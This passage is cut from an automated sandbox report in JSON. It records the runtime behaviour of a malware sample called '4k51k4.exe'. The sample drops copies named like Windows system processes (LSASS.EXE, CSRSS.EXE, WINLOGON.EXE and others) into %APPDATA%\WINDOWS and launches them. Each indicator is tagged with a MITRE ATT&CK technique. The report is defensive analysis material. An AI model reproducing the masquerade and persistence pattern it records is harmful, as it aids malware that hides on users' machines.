\"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000908)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000908)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000908)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000908)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000908)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005848)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005848)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003840)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003840)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002720)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002720)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006048)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005452)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005452)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005504)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005504)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005728)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003380)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003380)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005952)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005952)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005952)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005956)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005752)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003560)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003560)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003560)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003560)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003560)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001452)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001452)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003536)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003536)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500526ea175@CRYPTSP.dll\"\n \"10001100f412dc74@rsaenh.dll\"\n \"10001100e012dc74@rsaenh.dll\"\n \"08000900d412dc74@rsaenh.dll\"\n \"0b000c00c812dc74@rsaenh.dll\"\n \"0c000d00b812dc74@rsaenh.dll\"\n \"0d000e00a812dc74@rsaenh.dll\"\n \"0d000e009812dc74@rsaenh.dll\"\n \"0b000c008c12dc74@rsaenh.dll\"\n \"0b000c008012dc74@rsaenh.dll\"\n \"09000a007412dc74@rsaenh.dll\"\n \"09000a006812dc74@rsaenh.dll\"\n \"0c000d005812dc74@rsaenh.dll\"\n \"0a000b004c12dc74@rsaenh.dll\"\n \"100011003812dc74@rsaenh.dll\"\n \"0d000e002812dc74@rsaenh.dll\"\n \"0a000b001c12dc74@rsaenh.dll\"\n \"110012000812dc74@rsaenh.dll\"\n \"0b000c00fc11dc74@rsaenh.dll\"\n \"0c000d00ec11dc74@rsaenh.dll\"\n \"0e000f00dc11dc74@rsaenh.dll\"\n \"0e000f00cc11dc74@rsaenh.dll\"\n \"0e000f00bc11dc74@rsaenh.dll\"\n \"0e000f00ac11dc74@rsaenh.dll\"\n \"0e000f009c11dc74@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004972)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005592)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005664)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003520)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002640)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00001600)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00004972)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005592)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A40000\n \"LSASS.EXE\" loaded module 